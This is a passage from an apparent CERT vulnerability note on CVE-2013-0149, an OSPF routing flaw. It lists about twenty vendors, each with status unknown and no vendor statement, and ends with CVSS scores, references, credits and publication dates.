Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Secureworx, Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Silicon Graphics, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Slackware Linux Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

SmoothWall Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Snort Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Sony Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Sourcefire Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Stonesoft Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Symantec Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

The SCO Group Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

TippingPoint Technologies Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Turbolinux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Ubuntu Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Unisys Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Wind River Systems, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Windstream Unknown

Notified: July 29, 2013 Updated: July 29, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

ZyXEL Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

m0n0wall Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

netfilter Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

View all 97 vendors View less vendors

CVSS Metrics

Group | Score | Vector
---|---|---
Base | 5.4 | AV:A/AC:M/Au:N/C:P/I:P/A:P
Temporal | 4.2 | E:POC/RL:OF/RC:C
Environmental | 5.1 | CDP:MH/TD:M/CR:ND/IR:ND/AR:H

References

  • <http://tools.ietf.org/html/rfc2328>
  • <http://en.wikipedia.org/wiki/Open_Shortest_Path_First>

Acknowledgements

Thanks to Dr. Gabi Nakibly for reporting this vulnerability.

This document was written by Chris King.

Other Information

CVE IDs: | CVE-2013-0149
---|---
Date Public: | 2013-08-01
Date First Published: | 2013-08-02
Date Last Updated: | 2013-12-06 18:59 UTC
Document Revision: | 58